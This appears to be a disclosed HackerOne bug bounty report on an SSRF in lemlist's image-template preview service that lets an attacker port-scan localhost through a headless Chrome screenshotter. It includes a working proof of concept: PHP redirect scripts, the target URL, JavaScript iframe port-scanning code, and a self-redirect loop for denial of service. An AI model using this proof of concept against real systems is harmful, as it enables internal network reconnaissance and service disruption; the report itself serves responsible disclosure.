lemlist: SSRF in img.lemlist.com that leads to Localhost Port Scanning

ID H1:783392
Type hackerone
Reporter arsene_lupin
Modified 2020-05-28T10:39:49



A SSRF attack can be performed leading to localhost port scanning. Link : https://img.lemlist.com/api/image-templates/itp_vBBNpQuMsy6FYLQAc/?preview=true&email=email@

Steps To Reproduce:

To perform this port scan you'll need to setup a few files.

First of all you need to change the url in {F696241}. {F696243}

That being done you will need to do the same thing in your redirection script php <?php // PHP permanent URL redirection header("Location: [YOUR WEBSITE]/PoC.html?i=0", true, 301); exit(); ?>

Now you need to setup a website who will host {F696241}, {F696249} and the redirection.

I suggest to put everything in a single file and run the command : php -S

Afterward you need to go to the following link: https://img.lemlist.com/api/image-templates/itp_vBBNpQuMsy6FYLQAc/?preview=true&email=email@ [YOUR WEBSITE]


Here is a PoC of the Port Scan beeing performed {F696236}


Sometimes this port scan only return one port or none due to headless chrome screenshoting the website before the redirection. I would suggest to try different timeout in the scanChromeLinux() function.

javascript async scanChromeLinux(iframe, a) { var that = this; let promise = new Promise(function(resolve, reject){ that.hooks = {oncomplete:function(){ document.body.removeChild(iframe); resolve(); }}; that.scan = function() { var port = that.q.shift(), calls = 0, timer; iframe.src = that.url + ":" + port; a.href = iframe.src + '#'; that.updateProgress(port); iframe.hasLoadedOnce = 0; iframe.onload = function(){ calls++; if(calls > 1) { clearTimeout(timer); that.next(); return; } iframe.hasLoadedOnce = 1; a.click(); }; timer = setTimeout(function(){ if(iframe.hasLoadedOnce) { that.openPorts.push(port); } that.next(); }, 500 ); // <-- CHANGE THAT VALUE }; that.scan(); }); return promise; }


You can perform a DOS on the website by making the redirection returning itself: php <?php // PHP permanent URL redirection header("Location:https://img.lemlist.com/api/image-templates/itp_vBBNpQuMsy6FYLQAc/?preview=true&email=email@[YOUR WEBSITE]", true, 301); exit(); ?>


We can Port Scan local and remote servers, directory and bruteforce HTTP services. Besides if the screenshot as enough quality, it would be possible to return sensitives data from local HTTP services running on the machine.